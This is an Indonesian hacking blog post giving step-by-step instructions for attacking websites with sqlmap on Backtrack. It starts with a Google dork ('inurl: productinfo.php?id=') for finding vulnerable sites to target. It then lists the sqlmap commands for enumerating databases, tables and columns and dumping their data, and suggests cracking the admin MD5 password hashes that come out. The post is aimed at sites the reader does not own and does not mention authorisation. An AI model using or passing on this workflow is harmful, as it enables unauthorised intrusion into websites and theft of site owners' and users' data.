Select Menu

Ads

Random Posts

Black-Ink. Diberdayakan oleh Blogger.

Metasploit

Web Pentest

Circle Gallery

" });

Our Chanel

Tutorial

Tools

» » » Hack Web Dengan "sqlmap" auto sql injections - Backtrack

Sebelumnya, untuk melakukan tehnik ini kita memerlukan beberapa peralatan:

  • PC/Laptop yang sudah terkoneksi Internet ( WAJIB)
  • OS Backtrack tentunya ( VBox, DualBoot, SingleBoot )
  • Kopi, Snack, Rokok sebagai Pelengkap
Langkah Pertama, kita cari target dengan menggunakan dork, Misalnya :

inurl: productinfo.php?id=

Please use google + your brain to find more ..

Tentunya kawan2 sudah bisa membedakan mana yang vunl dan mana yang tidak. Ane asumsikan kita sudah mendapatkan targetnya. lanjut next step.

Buka terminal & copykan command ini di terminal :

cd /pentest/database/sqlmap

Ntar bakal muncul kek gini :


Habis tu masukin comand dibawah ini untuk mencari databasenya:
python sqlmap.py -u www.victim.com --dbs


Setelah Menemukan Databasenya, kita lanjut mencari Table nya, ketik comand dibawah ini :
python sqlmap.py -u www.victim.com -D DB_Name --tables



Kemudian kita lanjut mencari columns dari Table yang sudah kita temukan :
python sqlmap.py -u www.victim.com -D DB_Name -T Nama_Table --columns



Langkah berikutnya, Kita tinggal dump columns yang kita inginkan untuk mendapatkan data di dalamnya :
python sqlmap.py -u www.victim.com -D DB_Name -T Table_Name --dump



Sekarang kita bisa memperoleh data dari columns yg kita tentukan.. selanjutnya ... terserah kawan - kawan deh ... :D
Mohon maaf pada tutorial ini ane kagak nyertain target live, biar bisa sama - sama belajar dalam menemukan target yang vunl.

Kalau seandainya ngedump Columns Admin, biasanya passwordnya berbentuk MD5, Silahkan di has terlebih dahulu .... Sekian dulu tutorial kali ini, semoga memberi manfaat buat kita semua... Salam

About Black-Ink

WePress Theme is officially developed by Templatezy Team. We published High quality Blogger Templates with Awesome Design for blogspot lovers.The very first Blogger Templates Company where you will find Responsive Design Templates.
«
Next
Posting Lebih Baru
»
Previous
Posting Lama

Tidak ada komentar

Leave a Reply

Biakan Jadi Pembaca Yang Tau berterima kasih .... :D
Meski hanya dengan menulis kata Terima kasih ...